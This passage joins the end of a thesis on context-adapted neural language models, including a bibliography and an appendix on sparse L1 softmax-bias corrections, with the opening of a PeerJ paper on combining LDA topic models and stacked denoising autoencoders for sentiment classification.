neural networks for language modeling. In Proc. Interspeech. David Talbot and Thorsten Brants. 2008. Randomized language models via perfect hash functions. In Proc. ACL. Jian Tang, Yifan Yang, Sam Carton, Ming Zhang, and Qiaozhu Mei. 2016. Context- aware natural language generation with recurrent neural networks. arXiv preprint arXiv:1611.09900. Trang Tran and Mari Ostendorf. 2016. Characterizing the language of online communities and its relation to community reception. In Proc. EMNLP. Bo-Hsiang Tseng, Hung-yi Lee, and Lin-Shan Lee. 2015. Personalizing universal recurrent neural network language model with user characteristic features by social network crowd- sourcing. In Proc. IEEE Workshop on Automatic Speech Recognition and Understanding (ASRU), pages 84–91. Roger CF Tucker, Michael J Carey, and Eluned S Parris. 1994. Automatic language identi- fication using sub-word models. In Proc. ICASSP, volume 1, pages I–301. 103 Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez, Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Proc. NIPS, pages 6000–6010. Po-Wei Wang, J. Zico Kolter, Vijai Mohan, and Inderjit S. Dhillon. 2018. Realtime query completion via deep language models. In Proc. ICLR. Tsung-Hsien Wen, Milica Gasic, Nikola Mrksic, Pei-Hao Su, David Vandyke, and Steve Young. 2015. Semantically conditioned LSTM-based natural language generation for spo- ken dialogue systems. In Proc. EMNLP. Tsung-Hsien Wen, Aaron Heidel, Hung-yi Lee, Yu Tsao, and Lin-Shan Lee. 2013. Recurrent neural network based language model personalization by social network crowdsourcing. In Proc. Interspeech, pages 2703–2707. Stewart Whiting and Joemon M Jose. 2014. Recent and robust query auto-completion. In Proc. WWW, pages 971–982. Yonghui Wu, Mike Schuster, Zhifeng Chen, Quoc V Le, Mohammad Norouzi, Wolfgang Macherey, Maxim Kr̃ikun, Yuan Cao, Qin Gao, Klaus Macherey, et al. 2016. Google’s neural machine translation system: Bridging the gap between human and machine trans- lation. arXiv preprint arXiv:1609.08144. Puyang Xu, Sanjeev Khudanpur, and Asela Gunawardana. 2011. Randomized maximum entropy language models. In Proc. Automatic Speech Recognition and Understanding (ASRU), IEEE Workshop on, pages 226–230. Dani Yogatama, Chris Dyer, Wang Ling, and Phil Blunsom. 2017. Generative and discrimi- native text classification with recurrent neural networks. arXiv preprint arXiv:1703.01898. Dani Yogatama, Chong Wang, Bryan R Routledge, Noah A Smith, and Eric P Xing. 2014. Dynamic language models for streaming text. TACL, 2:181–192. 104 Wojciech Zaremba, Ilya Sutskever, and Oriol Vinyals. 2014. Recurrent neural network reg- ularization. arXiv preprint arXiv:1409.2329. Matthew D. Zeiler. 2012. ADADELTA: an adaptive learning rate method. arXiv preprint arXiv:1212.5701. Weinan Zhang, Ting Liu, Yifa Wang, and Qingfu Zhu. 2017. Neural personalized response generation as domain adaptation. arXiv preprint arXiv:1701.02073. Xiang Zhang, Junbo Zhao, and Yann LeCun. 2015. Character-level convolutional networks for text classification. In Proc. NIPS, pages 649–657. Arkaitz Zubiaga, Inaki San Vicente, Pablo Gamallo, José Ramom Pichel Campos, Iñaki Alegŕıa Loinaz, Nora Aranberri, Aitzol Ezeiza, and Vı́ctor Fresno-Fernández. 2014. Overview of TweetLID: Tweet language identification at sepln 2014. In Proc. TweetLID@ SEPLN, pages 1–11. 105 Appendix A SPARSE CORRECTIONS FOR OUTPUT LAYER ADAPTATION In Chapter 3, we saw that adapting the output layer using a low rank term combined with a hash table that stored coefficients for individual words was helpful. The low rank term exploits similarities between contexts to boost the probability of words when appropriate. We hypothesized that there may be certain words that are unique to a particular context and are not well modeled by a low rank adaptation. The purpose of the hashed coefficients was to serve as a correction term to the low rank adaptation. In this appendix, we investigate a sparse correction term, where sparsity is achieved by using an L1 penalty during training, as an alternate method of modeling exceptions to the low rank adaptation. A.1 Sparse plus low-rank softmax bias adaptation We test two methods of forming embeddings for low rank adaptation of the output layer. One is to use a neural network as in Equation 2.4 to make a single embedding that summarizes all context variables. The second method is to learn individual embedding matrices for each of the n context variables. In this case Equation 2.6 is replaced with yt = softmax(E Tht + n∑ i=1 Gici + b2), (A.1) which has individual adaptation terms for each context variable. The sparse correction to the low rank adaptation bias has a similar form except that the low-dimensional context embeddings, ci are replaced by one-hot encoded vectors, oi. yt = softmax(E Tht + n∑ i=1 Gici + n∑ i=1 Aioi + b2), (A.2) 106 The Ai matrices will have a rank equal to the cardinality of the i-th context variable and therefore are much larger than the Gi matrices whose rank is set by the dimensionality of ci. To encourage sparsity in the Ai matrices we apply a soft threshold operator: u(s,λ) =   s + λ s < −λ 0 −λ ≤ s ≤ λ s−λ λ < s (A.3) This has the identical effect as introducing an L1 penalty term in the objective except that it sets coefficients to be exactly zero if they are within a certain range. During tuning we search for the optimal penalty term λi for each of the four context variables. The soft thresholding operation u(Aioi,λi) is applied (the function is applied element-wise to each entry in Aioi). We make use of the same TripAdvisor data from Chapter 4 except that instead of using two context variables (hotel identifier and review sentiment), we have four: hotel identifier, month of stay, year of stay, and region. There are 2,918 hotels, 14 years (from 1999 to 2012), 12 months, and 25 regions (major cities in the United States). We hypothesized that the more detailed context would have more specialized language, which might have more potential to benefit from sparse correction. Because of the success with the hash table, we hypothesized that sparse terms would be most useful at the output layer. Thus, we use no adaptation at the recurrent layer for the following experiments. The vocabulary size is fixed to 10,000 words (11% the size of the one used on the same data in Chapter 4) so that the model can be trained quickly using a full softmax loss. Using a sampled softmax loss may interfere with the application of the added regularization term on the softmax bias vector. We trained 59 models using a random search strategy for hyperparameter tuning. All models used a fixed word embedding and GRU dimension of 72 and a batch size of 64. Using a smaller GRU dimension, as we did here, places more importance on the softmax layer and gives the adaptation a better chance of having an impact. The hyperparameters that varied between models were the dimensionality of the embeddings of the four context variables, 107 LR Sparse PPL No No 44.0 Yes No 41.0 No Yes 41.4 Yes Yes 41.2 Table A.1: Perplexity on the validation set of models with no adaptation and varying soft- max adaptation strategies. Results are not comparable to those in Chapter 4 because of a difference in vocabulary size. the λ’s for each context variable, and whether to use or disable each of the two forms of adaptation. For a model that uses no low-rank adaptation, the sparse matrix used to adapt the bias for the region variable contains 29 million parameters, 96% of the total. This is intended to be over-parameterized so that the regularization will be useful. All of our results are on the validation set and not the test set. As seen in Table A.1, the best model used a low rank adaptation and no sparse correction. In theory, including the sparse correction should be no worse than without it as long as the λ’s are properly tuned. The fact that performance was worse for the low-rank case indicates that more experiments are needed for proper tuning. Among the models that did use a sparse correction term, we found that the models that worked best had λ’s equal to or so close to zero that the regularization had no effect. There was no apparent benefit to having an L1 penalty on this data set with this size of model and vocabulary. A second finding is that using separate embeddings for each context variable as in Equa- tion A.1 is better for adapting the softmax layer than combining them using a neural network hidden layer as in Equations 2.4 and 2.6. The difference was small (perplexities of 41.0 ver- sus 41.3) but consistent. This indicates that the optimization of the context embedding parameters could be improved. In predictive text applications, language models are used to suggest the next words 108 that someone might want to type in order to speed-up the process of typing on a mobile device. The top-3 next word prediction accuracy as a metric is a better fit to this task than perplexity. We computed the top-3 accuracy for the language models used in these experiments and found that using the “sparse”1 adaptation strategy had a bigger impact on the accuracy than perplexity. The best model had a top-3 accuracy of 46.35% and used both low-rank and sparse adaptation compared to 46.27% for the best model using only low rank adaptation. The difference is small but significant (p < 0.001). A.2 L1 Penalty for Bias Layer Fine-Tuning We mentioned model fine-tuning as a type of adaptation in Section 2.3.1. In this section we test if including an L1 penalty on the bias term is helpful when fine-tuning a pre-trained language model to match the style of a small set of data from another domain. We created small datasets for fine-tuning by selecting the subset of TripAdvisor reviews that mention the word “Hilton” and those that are for hotels in Boston. A third dataset was created by selecting a random subset of (mostly restaurant) reviews from the Yelp dataset and then a fourth used only the reviews from the Yelp dataset that were for a dentist office. For the pre-trained model, we used the best unadapted TripAdvisor model from Section A.1. The fine-tuning was done by continuing training of that model on the new smaller dataset until it began to over-fit. In a realistic scenario there would not be a large validation set available to check for over-fitting but in this experiment we are just aiming for a proof- of-concept. We tried selectively freezing layers of the pre-trained model and also varied the size of the training data and the scale of the L1 penalty. In each case the best result was obtained by using zero penalty and early stopping as the only regularizer. 1It is not actually sparse because the weight on the L1 regularization term was near zero. 109 A.3 Summary After conducting these experiments we were unable to find a benefit from using an L1 penalty term to learn a sparse correction to a low-rank model in adapting the softmax bias. There are multiple possible explanations for this negative result. • It is possible that the data we used is not the right one for this technique. If we had used another dataset where the size or vocabulary was different then it is possible that having a sparse correction would be helpful. • Our use of random search for tuning the regularization penalties could be improved. We might have seen a different result with better tuning. • We purposefully created a model that was over-parameterized. Over-parameterization can lead to over-fitting unless regularization is used. Using the L1 penalty is equivalent to setting a Laplacian prior distribution on the parameters. The regularization encour- ages the parameters to not be too far from zero on average. However, even without regularization, the parameter values do not grow too large during any practical length of time. The training data constrains the parameter values in the bias from becom- ing too large in the positive direction and. For the negative direction, the bias terms for words that are never used for particular contexts do not reach negative infinity in because their gradients decrease exponentially faster than the parameters themselves. It turns out that stopping gradient descent after a finite amount of time is a more effective means of regularizing the parameters than applying an L1 penalty. • We hypothesized that sparse corrections would be most useful at the softmax layer, but it is possible that they are helpful at the recurrent layer or for adapting the word embeddings. • We assumed that not adapting the recurrent layer would give the sparse softmax bias adaptation a better chance of success. It is possible this assumption is incorrect and 110 that having a sparse correction is only helpful after the low-rank component has been accounted for by adapting the recurrent layer. In summary, we did not find a use for L1 regularization for adapting the softmax bias vector. More work is needed to confirm these experiments and to understand why. work_fljh2g733fa2fnxmkvwa4p3kby ---- Beyond the topics: how deep learning can improve the discriminability of probabilistic topic modelling Beyond the topics: how deep learning can improve the discriminability of probabilistic topic modelling Noura Al Moubayed1, Stephen McGough2 and Bashar Awwad Shiekh Hasan3 1 Department of Computer Science, Durham University, Durham, UK 2 Department of Computer Science, University of Newcastle upon Tyne, Newcastle, UK 3 Caspian Learning, Newcastle upon Tyne, Newcastle, UK ABSTRACT The article presents a discriminative approach to complement the unsupervised probabilistic nature of topic modelling. The framework transforms the probabilities of the topics per document into class-dependent deep learning models that extract highly discriminatory features suitable for classification. The framework is then used for sentiment analysis with minimum feature engineering. The approach transforms the sentiment analysis problem from the word/document domain to the topics domain making it more robust to noise and incorporating complex contextual information that are not represented otherwise. A stacked denoising autoencoder (SDA) is then used to model the complex relationship among the topics per sentiment with minimum assumptions. To achieve this, a distinct topic model and SDA per sentiment polarity is built with an additional decision layer for classification. The framework is tested on a comprehensive collection of benchmark datasets that vary in sample size, class bias and classification task. A significant improvement to the state of the art is achieved without the need for a sentiment lexica or over-engineered features. A further analysis is carried out to explain the observed improvement in accuracy. Subjects Artificial Intelligence, Data Mining and Machine Learning, Data Science, Natural Language and Speech Keywords Topic modelling, Stacked denoising autoencoders, Text classification, Sentiment analysis INTRODUCTION The rise of social media and online reviews has resulted in an exponential increase in the available data. Facebook has over a billion and a half active users a month (Smith, 2019) with billions of comments, and social reactions (in form of like, love, etc.). Twitter, the largest micro-blogging website, has 313 millions of users (Clement, 2019) writing 500 million tweets on a daily basis. Customer reviews are a standard feature of almost every online purchasing service (e.g. Amazon or Expedia). This vast wealth of data is raising the need for sophisticated analysis methods to better understand and exploit the knowledge hidden in the data. A successful approach is probabilistic topic modelling, which follows a hierarchal mixture model methodology to unravel the underlying patterns of words embedded in large collections of documents (Blei, Carin & Dunson, 2010; Hofmann, 1999; Canini, Shi & Griffiths, 2009). The discovery of these patterns, known as topics, opens the doors for How to cite this article Al Moubayed N, McGough S, Awwad Shiekh Hasan B. 2020. Beyond the topics: how deep learning can improve the discriminability of probabilistic topic modelling. PeerJ Comput. Sci. 6:e252 DOI 10.7717/peerj-cs.252 Submitted 3 April 2018 Accepted 23 December 2019 Published 27 January 2020 Corresponding author Noura Al Moubayed, noura.al-moubayed@durham.ac.uk Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 27 DOI 10.7717/peerj-cs.252 © 2020 Al Moubayed et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.252 mailto:noura.�al-moubayed@�durham.�ac.�uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.252 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ deeper analysis of the data including: clustering, sorting, summarisation, and prediction (Blei, Carin & Dunson, 2010). Latent Dirichlet Allocation (LDA) (Blei, Ng & Jordan, 2003) is one of the most commonly used probabilistic topic modelling methods. It decomposes a collection of documents into its salient topics. A topic in LDA is a probability distribution over the documents’ vocabulary. LDA assumes a fixed number of topics set apriori and that each document may contain a combination of topics. LDA, and its variants (Teh et al., 2005; Porteous et al., 2008), is a completely unsupervised method with very few prior assumptions which has led to its popularity in text summarisation and clustering of large unstructured datasets. However, when labelled data is available it would be beneficial to include the class label in the model itself as demonstrated in (Mcauliffe & Blei, 2008; Perotte et al., 2011; Huh & Fienberg, 2012; Zhu, Ahmed & Xing, 2009). Latent Dirichlet Allocation was customised to accommodate specific application area like sentiment analysis. Sentiment analysis tries to understand the sentiment behind the written text, for example product reviews. This problem has drawn a lot of attention in the last few years given the social and commercial impact it has (Bradley & Lang, 1999; Bravo-Marquez, Mendoza & Poblete, 2013; Go, Bhayani & Huang, 2009; Liu, 2012). In a highly competitive online market the deeper the understanding of customer views and attitudes the further advantage a business can have against the competition. Jo & Oh (2011) extended LDA to include sentence modelling with aspect/sentiment. Mei et al. (2007) and Lin & He (2009) explicitly model the sentiments in the data and then train the model in an unsupervised approach similar to the standard LDA. Topic modelling for sentiment analysis reduces the need for hand-crafted features and especially annotated corpora (Bradley & Lang, 1999; Cambria, Havasi & Hussain, 2012; Esuli & Sebastiani, 2006; Nielsen, 2011). In this work, we take a novel approach to expand the modelling power of LDA within a supervised framework. The framework builds a separate LDA model per class. Each LDA is then used as a feature extractor to train a Stacked denoising autoencoder (SDA). The trained SDAs are used to generate the input to a simple classifier. The added layer of SDAs help further increase the disrciminability among the classes and hence achieve higher classification accuracy. The introduced framework addresses the following points: (I) It avoids language specific sentiment lexicon and directly engineered features on the word/sentence level. Instead, we focus on modelling higher level abstract concepts/topics. (II) The system learns through hierarchical structure modelling to better understand the inter-dependencies among words and topics to convey the sentiment. (III) The framework is very general and can easily be adapted to different tasks and data sets with minimum feature engineering. This approach is motivated by three key points: � Context embedding: topic modelling through a probabilistic mixture approach (e.g. Latent Dirichilet Allocation) is highly advantageous in modelling the context in which words may appear given a sentiment. This also transfers the classification problem from the words space (or an engineered feature space of words) to the topic space making the whole system much more robust to noise. Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 2/32 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ � Structural modelling of topics: the use of SDA through a hierarchal structure of deep neural network captures, with minimum assumptions, the structural inter-dependencies among topics within the context of a sentiment (e.g. polarity, subjectivity, etc.). � Simplified classification: as we will show in the methods and experiments, the combined use of topic modelling and SDA with our novel utilisation of reconstruction error (RE) results in highly separable feature space requiring only a simple linear classifier. The main contributions of this work are: � Develop a framework for automatic text classification with minimum feature engineering. � Expand topic modelling by introducing an additional layer of abstraction to model the inter-relations amongst topics of the same text category. � Introduce the RE of an auto-encoder as a surrogate measure of sample representation by the auto-encoder. The REs of the built SDAs are used as features for classification. � Discriminability analysis to explain the benefit of SDAs and RE in enhancing the performance of the text classification task. The framework is tested on ten benchmark datasets that vary in classification task, size, and domain with results significantly outperforming the state of the art on 8/10 of the datasets. The next section reviews the related work in sentiment analysis. “Methods” details the methods used, followed by a description of the datasets used and the experimental design in “Data Sets and Experiments”. The results are reported in “Results”, while “Discussion” further examines the approach and the achieved results, and “Conclusion” summarizes the article. RELATED WORK Text classification problems are usually viewed as two tier problems: feature extraction and classification. Reviewing the state of the art in text classification is beyond the scope of this paper, however as we take sentiment analysis as an application we will briefly review the literature in this application. Feature extraction/engineering Early work on sentiment analysis approached the problem from the traditional topic-based categorisation point of view. This involved standard natural language processing (NLP) techniques such as bag of words (Pang, Lee & Vaithyanathan, 2002), word vectors (Maas et al., 2011; Pouransari & Ghili, 2014), n-grams (Nguyen et al., 2014), and rule-based classifiers (Riloff, Wiebe & Phillips, 2005). Despite their initial success these methods performed worse than expected in comparison with other topic categorisation problems, as the approaches taken were not designed specifically for sentiment classification. Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 3/32 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ To incorporate prior information into the feature extraction method a lexical resource for sentiment analysis is needed to assign a polarity (e.g. positive, negative, or neutral) to the words independent of the context. Wilson, Wiebe & Hoffmann (2005) built the Opinion Finder lexicon on individual words and then used it to define sentiment at the level of phrases. A similar approach was taken by Zirn et al. (2011) which uses a sophisticated Markov chain method to predict the contextual sentiment of words within phrases or short text. Another commonly used lexicon for English language was presented by Bradley & Lang (1999) and later used for twitter sentiment analysis by Nielsen (2011). Other well-known lexicons include SentiStrength (Thelwall, Buckley & Paltoglou, 2012) and NRC (Mohammad & Turney, 2013). For more discussion and comparisons among the lexical resources the interested reader is referred to the work by Bravo-Marquez, Mendoza & Poblete (2013), where the authors also combined features from several lexical resources to enhance the performance of the overall system. An appraisal group of sentiments was developed by Whitelaw, Garg & Argamon (2005) and then used to produce bag of words features. Based on the psychological definition of emotional states, Mohammad & Turney (2013) labelled a word bank for sentiment analysis. To establish more context aware features Kennedy & Inkpen (2006) used contextual valence shifters to rank words within a text which can then be fed to a classifier. Nguyen et al. (2014) used ratings (labelled or predicted) to enhance the performance of a word vector based sentiment analysis system. A sophisticated feature engineering approach was used for twitter data by Agarwal et al. (2011). It starts by using a polarity dictionary to assign a prior polarity to each word and then a tree representation of tweets is designed to combine many categories of features in one structure. A convolution kernel is then employed to compare among several trees. Tang et al. (2014b) used neural networks to learn sentiment specific word embedding (SSWE) to transform words into a continuous representation that takes into account the sentiment and syntactic context of words. In the context of information retrieval, Eguchi & Lavrenko (2006) used a generative probabilistic model for topic modelling in order to retrieve documents with certain sentiment/polarity. The model extends the definition of topics within the text to model sentiments. The user would then request documents by topic and sentiment. A topic sentiment mixture model was proposed by Mei et al. (2007) which builds sentiment models for positive and negative opinions and extract topic models with their relevant sentiment coverage. Similarly a joint sentiment/topic model (JST) was presented by Lin & He (2009) that extends the well known unsupervised model, LDA. JST was further extended by Jo & Oh (2011) to handle words from several languages. The advantage of topic modelling in general is that: (I) it allows for the extraction of useful information without the need for significant feature engineering. (II) The dimensionality of the resulting feature space can be set a-priori and is usually much smaller than the sparse feature vectors resulted from bag of words or n-grams. (III) LDA, and other Bayesian topic models, is adaptive by definition providing the overall system with the ability to handle streams of data very efficiently. (IV) transforming the input space to topics space makes the classifier less sensitive to noise. In “Methods” we present LDA in its original form before using it later to extract topic features (without modelling the Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 4/32 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ sentiment). The sentiment modelling is carried out on a later stage using deep neural networks. Classification Following topic categorisation problems several machine learning classification methods (mostly supervised) are commonly employed. Maximum Entropy classifier, which measures the amount of information the features can ‘tell’ about the polarity/sentiment, was used repeatedly (Pang, Lee & Vaithyanathan, 2002; Saif et al., 2013). Naive Bayes classifier was also used by Wu & Pao (2012). However, Support Vector Machines (SVM) are arguably the most widely used approach for sentiment prediction (Agarwal et al., 2011; Bravo-Marquez, Mendoza & Poblete, 2013; Nguyen et al., 2014; Wu & Pao, 2012). More recently deep neural networks have been adopted for sentiment analysis after their impressive performance in several tasks under the umbrella of NLP (Collobert et al., 2011). Pouransari & Ghili (2014) utilised a recursive neural network (RNN) to model not only the individual words but how they appear in relationship to each other within a phrase of a given sentiment. RNN is commonly used in NLP due to their ability to model such structures. However, to represent complex relationships (e.g. negated positive) Socher et al. (2013) presented recursive neural tensor networks. A combined RNN model that takes into account the aspect extraction and sentiment representation was presented in Lakkaraju, Socher & Manning (2014) using a hierarchical deep learning framework. A dynamic convolutional neural network was used by Kalchbrenner, Grefenstette & Blunsom (2014) to handle input sentences of varying length capturing short and long-range relations, which could be particularly important for sentiment analysis. Tang et al. (2014a) used the same neural networks for SSWE but with added convolutional layers for category prediction. Wu & Pao (2012) built a deep feed-forward neural network to extract and classify high level features obtained from n-grams with the aim of reducing the complexity of feature engineering. A brief review and comparison of performance in sentiment analysis among RNN, and convolutional networks is discussed by Shirani-Mehr (2014) where the authors find, based on testing on one dataset only, that convolutional neural networks with word vector features performed better than the other networks or the baseline Naive Bayesian classifier. Most relevant to our work are semi-supervised recursive autoencoders (AE) which were introduced for sentiment analysis by Socher et al. (2011). The authors used AE (described in “Stacked Denoising Autoencoders”) without a predefined structure with a combined reconstruction and cross entropy errors as the optimisation objective of the structural learning approach. AE based algorithms were used by Mirowski, Ranzato & LeCun (2010) to model a bag of words for text classification, topic modelling, and sentiment analysis tasks using a similar semi-supervised approach. Pollack (1990) introduced recursive AE as a compact distributed representation method for data, including textual data. However, the approach relied on binary word representation requiring a large sparse input space. To enhance generalisation a linear modification was introduced by Voegtlin & Dominey (2005) but with the same binary features. Word vector features were used by Socher et al. (2011) which are argued to be more suitable for AE, which require continuous data by definition. Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 5/32 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ METHODS Our framework aims at finding a uniform way of representing variable-sized phrases and then using this representation effectively to achieve accurate sentiment classification. Topic modelling is used as a feature extraction method which provides a robust representation that requires minimum feature engineering independent of the language used and without the need for task-specific lexicon. It also converts a variable length document to a vector of probabilities (i.e. continuous variables) which has an advantage when modelling with stacked AE. AE uses the input topic model representation of all the documents labelled as conveying a specific task (e.g. sentiment) to build a structural representation that defines that task. REs, of the different AEs are then used by a simple classifier (we explore several options in “Classification Approach”) to provide the final prediction of the task perceived from the input document. Shifting the problem from word and phrases representation to topic representation has the advantage of building more dynamic and robust systems where small changes on the document level (or the introduction of new documents) will not cause a major change in how the topics are represented opening the door for adaptive text classification models that are able to cope with the fast changing content of the web. Figure 1 describes the process of sentiment analysis using the proposed framework in this article. The input data of several resources is separated to negative and positive polarity. Two topic models are then built using the polarity specific data. The extracted features from each topic model are used to train the corresponding SDA model. To predict the sentiment of a given text, it is passed through the two topic models and the two SDAs resulting in an overall reconstruction error (ORE) per SDA which are used by a linear classifier to predict the polarity. Topic modeling Consider, conceptually, that a phrase expressing a given task/sentiment is formed from a collection of words which are commonly used to express that sentiment. By capturing those task-related words, in the form of a topic, we should be able to capture the sentiment of a phrase (or document) more accurately than conventional keyword analysis. Through the building of a text/language model that transforms the words into an abstract (vector) representation should result in more informative features that are less affected by ‘noise’ at the word or even document level. This area of research is referred to as topic modelling (Blei, 2012). Within the context of a given text classification task, topic models are able to automatically include contextual information, which is particularly helpful in cases where a word might reflect different sentiments in different domains/topics (e.g. ‘easy’ would be a positive sentiment in the context of the use of household items, but an ‘easy’ online game would be perceived negatively). Topic models are built as a Bayesian network (Blei, 2012) where the observed variables (the words) can be generated by realisation of random variables within the network. The network is equivalent to a mixture of models, that is a document is associated with the probability of it containing a topic Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 6/32 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ and a document could include more than one topic. A word can be in more than one topic and a topic consists of more than one word. The probability of each document containing each of the topics can be used for further analysis. Latent Dirichlet Allocation (Blei, Ng & Jordan, 2003) is the most commonly used method for topic modelling (Al Moubayed, Wall & McGough, 2017). LDA works by measuring the co-occurrence statistics of words/terms in a set of documents leading to recognising the topic structure within those documents. The only assumption made by LDA is the number of underlying topics, k, responsible for generating the documents, and a multinomial distribution of the topic over the words in the vocabulary. A document can then be seen to be generated by sampling a finite mixture of topics and then sampling words from each of these topics. The ordering of the words is irrelevant to LDA. Here we briefly describe LDA. We model each document w, from a corpus D that contains N words as a generative process: � Choose θ Dir(α). � For each of the N words wn: define a topic zn Multinomial (θ) and a multinomial probability conditioned on topic zn (p(wn—zn, β). Figure 1 A schematic description of the overall classification scheme for sentiment analysis using the proposed framework. From bottom up the data come from various resources. Data is separated per sentiment and a topic model per sentiment is built. All the data are then passed through the topic models to generate features used by two SDAs for the positive and negative sentiment. Finally a classifier is used to predict the output. Full-size DOI: 10.7717/peerj-cs.252/fig-1 Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 7/32 http://dx.doi.org/10.7717/peerj-cs.252/fig-1 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ where Dir is the Dirichlet function, α is a k-dimensional vector parameter with αi > 0. For k topics the probability density of θ is defined as: pðujaÞ ¼ Γð Pk i¼1 aiÞQk i¼1 ΓðaiÞ u a1�1 1 …u ak�1 k (1) where Γ is the Gamma function. Given the auxiliary parameters α and β, the joint distribution of a topic mixture θ, topic z and word w is defined as: pðu; z; wja; bÞ ¼ pðujaÞ YN n¼1 pðznjuÞpðwnjzn; bÞ; (2) where p(zn|θ) = θi such that z i n ¼ 1. To obtain the document probability density we can marginalise over θ and z. pðwja; bÞ ¼ Z pðujaÞ � YN n¼1 X zn pðznjuÞpðwnjzn; bÞ � du (3) The corpus probability is then defined as: pðDja; bÞ ¼ YM d¼1 Z pðwdja; bÞdwd (4) Efficient parameter estimation is usually done through variational Bayesian methods or Gibbs sampling (Blei, Ng & Jordan, 2003). The complete description of LDA is beyond the scope of this paper, interested readers are referred to Blei, Ng & Jordan (2003). LDA has been widely used for text modelling and classification. In the context of sentiment analysis several studies tried to extend the original LDA model for polarity classification (Eguchi & Lavrenko, 2006; Mei et al., 2007; Lin & He, 2009). However, these methods focused on adding an additional layer of abstraction (via latent variables) to describe the different sentiments of interest. This is limited to the strong assumptions put into the Bayesian network. In this work we use a deep neural network (explained in the next section) which can model complex relationships among topics that are responsible for generating the documents. This approach requires minimum assumptions about the relationship between topics/documents and sentiments. Stacked denoising autoencoders Stacked AE fall under the umbrella of representative learning using deep neural networks. The goal of an AE is to learn an abstract representation of the data presented at its input. The input can be reconstructed from that representation. Hence the desired output of the AE is the input itself (Bengio, 2009; Bourlard & Kamp, 1988; Japkowicz, Hanson & Gluck, 2000). Hinton & Zemel (1994) defined an AE as ‘a network that uses a set of recognition weights to convert an input vector into a code vector. It then uses a set of generative weights to convert the code vector into an approximate reconstruction of the input vector’. Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 8/32 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ Assuming we have a network of just two layers: an input (visible) layer of m dimensions x = (x1, x2, …, xm) (e.g. topic modelling features as described in the previous section) and a hidden layer of n nodes y = (y1, y2, …, yn). Each node in the hidden layer is connected to all the nodes in the input layer. In the construction phase we compute the hidden representation: y ¼ f ðWx þ bÞ (5) where W ∈ Rn × m is a weight matrix and b is a bias term. Figure 2A demonstrates a simplified example of such a network in the construction phase. To assess how well the new n-dimensional vector y represents the m-dimensional input x, we can reconstruct the input layer from the hidden layer (Fig. 2B): xrec ¼ WTy þ b (6) where WT is the transpose matrix of W. To train the network (i.e. optimise W and b) we want to minimise the RE between x and xrec: RE ¼ XN i¼1 jjDi � Direc jj22 (7) where N is number of m-dimensional input samples, Di is an input sample that is fed to the network, and Direc is the reconstructed version using Eq. (6). In this article we use the denoising variant of an autoencoder (DAE) (Vincent et al., 2010), which corrupts the inputs with added noise in order to enhance the generalisation of the network and hence enhance its representational power. The motivation behind adding Figure 2 Demonstration of denoising stacked autoencoders. (A) demonstrates the process of con- structing an autoencoder. Yellow circles represent an input layer and blue circles represent the hidden layer. (B) demonstrates the reconstruction process of the input from the units in the hidden layer. (C) A stacked denoising autoencoder. Each dashed rectangle represents an autoencoder. X represents a connection corrupted by noise. Full-size DOI: 10.7717/peerj-cs.252/fig-2 Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 9/32 http://dx.doi.org/10.7717/peerj-cs.252/fig-2 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ this noise factor is to avoid over-fitting, that is the network learns to model only the training samples. Figure 2C demonstrates the corruption process which randomly (using an isotropic Gaussian distributed noise) assigns a weight of 0 to the link between two nodes. DAEs are trained with standard stochastic gradient descent and usually perform significantly better than the standard AE (Vincent et al., 2010). Deep architectures facilitate the modelling of complicated structures and patterns efficiently (Ngiam et al., 2011; Vincent et al., 2010). Within the framework of DAE the deep network is built by stacking layers of denoising AEs that are trained locally, as explained above. The output/hidden layer of each AE plays the role of the input layer of the deeper network (Vincent et al., 2010) (Fig. 2C). As suggested by Vincent et al. (2010), SDA are usually used for feature extraction or dimensionality reduction followed by a classifier (e.g. SVM). Alternatively an additional logistic regression layer is added on top of the encoders, which serves as a supervised deep neural network (Hinton, Osindero & Teh, 2006; Hinton & Salakhutdinov, 2006). The parameters of the whole network are then optimised using standard gradient-based methods with the original SDA playing the role of unsupervised pre-training model. Overall reconstruction error Here we refer to the RE between layers as local reconstruction error. The RE as defined in Eq. (7) between the input data (e.g. topic modelling features) and the reconstructed features becomes a measure of the overall reconstruction error (ORE). Alain & Bengio (2014) showed that by minimising a particular form of regularised ORE stacked AEs capture the density generating the modelled data. This motivates the use of ORE as a surrogate measure of the ‘goodness’ of representation of an input example by the network. A high ORE suggests poor representation of the input sample while a small ORE is an indication of an accurate representation of the input. We, AlMoubayed et al. (2016), used ORE as an indication for outlier detection. The novel use of ORE here is as the feature extracted from each SDA model. As each SDA is trained on the output of a topic model associated with one class, the samples of other classes will produce high ORE while samples of the same class will generate low ORE. This results in easily separable (usually linearly) feature space as will be discussed later on. Bengio, Courville & Vincent (2012) and Erhan et al. (2010) demonstrated the reasons why unsupervised representational learning, including SDA, are able to model complex structure in data. The depth of the network, defined by the path between the input features and the output layer allows for efficient 